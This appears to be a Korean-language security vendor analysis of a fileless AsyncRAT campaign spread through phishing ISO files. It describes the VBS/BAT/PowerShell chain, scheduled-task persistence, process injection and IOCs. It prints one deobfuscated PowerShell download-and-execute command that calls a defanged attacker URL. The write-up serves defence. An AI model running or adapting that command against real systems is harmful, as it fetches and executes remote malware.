FileLess 형태로 유포 중인 AsyncRAT

ASEC 분석팀은 최근 FileLess 형태로 AsyncRAT 악성코드가 유포 중인 것을 확인하였다. 유포 중인 AsyncRAT 은 다수의 스크립트 파일을 통해 FileLess 형태로 실행되며, 이메일 내 압축파일로 첨부되어 유포되는 것으로 추정된다. AsyncRAT 은 닷넷으로 개발된 오픈 소스 RAT 악성코드로 공격자의 명령을 받아 다양한 악성 행위를 수행할 수 있다.

피싱 메일을 통해 유포되는 압축파일 내부에는 html 파일이 존재하며, 실행 시 내부 스크립트에 존재하는 악성 데이터를 ISO 파일로 저장한다. ISO 는 최근 다양한 악성코드들이 사용 중인 확장자이다.

압축파일 내부
악성 ISO 파일을 생성하는 HTML

생성되는 ISO 파일은 영수증 및 송장과 관련된 파일명을 사용하며, ISO 파일 내부에는 VBScript 와 bat 파일이 존재한다.

  • 파일명
    Receipt.iso
    Paid_invoice.iso
ISO 파일 내부 (1)
ISO 파일 내부 (2)

VBScript 는 함께 생성된 bat 파일을 실행하며, bat 파일은 난독화된 명령어를 실행한다.

VBS 코드
BAT 코드

난독화가 해제된 명령어는 아래와 같으며, cmd 를 통해 악성 파워쉘 명령어를 실행한다. 파워쉘 명령어는 특정 주소에 존재하는 추가 파워쉘 명령어를 실행하게 된다.

  • 난독화 해제된 명령어
    CMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$XCZM=’IEX(NEW-OBJECT NET.W’;$SYWD=’EBCLIENT).DOWNLO’;[BYTE[]];$VFDR=’TUUL(”hxxps://aga12[.]ir/ico.png”)’.REPLACE(‘TUUL’,’ADSTRING’);[BYTE[]];IEX($XCZM+$SYWD+$VFDR)

추가 파워쉘 명령어의 일부는 아래와 같으며, 총 5개의 스크립트 파일을 생성 후 실행하는 기능을 수행한다. 생성되는 5개의 스크립트 기능은 아래에서 소개한다.

추가 파워쉘 명령어 (1)
추가 파워쉘 명령어 (2)

1. C:\ProgramData\Express\xx.vbs

xx.vbs 코드

5개의 스크립트가 생성된 후 제일 처음으로 실행되는 스크립트 파일이다. 해당 스크립트는 함께 생성된 C:\ProgramData\Express\xx.bat 파일을 실행한다.

2. C:\ProgramData\Express\xx.bat

xx.bat 코드

해당 스크립트는 C:\ProgramData\Express\Cotrl.vbs 파일을 작업 스케줄러에 등록하는 기능을 수행한다. 스케줄러에 등록된 파일은 3분마다 실행되도록 한다.

3. C:\ProgramData\Express\Cotrl.vbs

Cotrl.vbs

해당 스크립트는 C:\ProgramData\Express\Cotrl.bat 파일을 실행한다.

4. C:\ProgramData\Express\Cotrl.bat

Cotrl.bat 코드

해당 스크립트는 파워쉘 프로세스를 강제 종료 후 C:\ProgramData\Express\Cotrl.ps1 파일을 실행한다.

5. C:\ProgramData\Express\Cotrl.ps1

Cotrl.ps1 코드 (1)
Cotrl.ps1 코드 (2)

최종적으로 실행되는 해당 스크립트가 실제 악성 행위를 수행한다. 스크립트 내부에는 2개의 악성 데이터가 존재하며, 각각 Loader 와 AsyncRAT 이다. 먼저 Loader 역할을 수행하는 첫번째 데이터가 로드되며, 해당 데이터의 GIT.local 의 Execute 메소드를 실행한다. 이때  “C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe” 경로와 두번째 데이터 (AsyncRAT) 가 인자로 전달된다.

GIT.local 의 Execute 메소드는 아래와 같으며, 인자로 전달받은 경로와 악성 데이터를 이용하여 정상 프로세스(C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe) 에 인젝션을 수행하게 된다.

Loader
Injection

인젝션되는 데이터는 AsyncRAT 으로, 깃허브에 공개된 오픈 소스 RAT 악성코드이다. C2 로부터 공격자 명령을 받아 다양한 악성 행위를 수행할 수 있으며, 대부분의 기능은 전달받는 플러그인을 통해 악성 행위가 수행된다. 기본적으로 존재하는 기능은 Anti-VM, 키로깅, 원격 쉘 등 이 존재한다.

  • C2
    vrln200.duckdns[.]org:6666
C2 복호화
Anti VM

최근 ISO 파일을 통해 유포되는 악성코드가 증가하고 있다. 또한, FileLess 형태로 악성코드가 실행되어 사용자가 어떤 유형의 악성코드가 실행되었는지 파악하기 어렵도록 한다. 사용자들은 출처가 불분명한 파일의 열람은 자제해야하며, 주기적인 PC 검사가 필요하다.

[파일 진단]
Dropper/HTML.Generic (2022.08.11.03)
Trojan/PowerShell.Loader (2022.08.18.00)
Dropper/ISO.Agent (2022.08.18.00)
Trojan/BAT.Runner (2022.08.18.00)
Downloader/BAT.Generic (2022.08.18.00)
Trojan/VBS.Runner (2022.08.18.00)

[IOC]
9e0d553e520083e2f90a8e3bb524f417
ac64ee0dea61fb0f596e3296f91462e5
f45ea3dc3e06583d49ac40833873006f
309d105bf0542574a9324f568b176021
ce77a7fb92d52727c19aca72d904abdc
752d899ee21cbdd31126e205b5840286
e0b62836b48a842f732c51857d37dbd8
448516ed6b6ef06865afbc775cd80bed
43ff49fbde6f4391891cf2a46b406da4
c840c0438f2fae0ddda74a43411a9b01
2a1082f25edff1dc5383239b1b012179
hxxps://aga12[.]ir/ico.png
vrln200.duckdns[.]org:6666

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

Categories:악성코드 정보

Tagged as:, ,

0 0 votes
별점 주기
guest
0 댓글
Inline Feedbacks
View all comments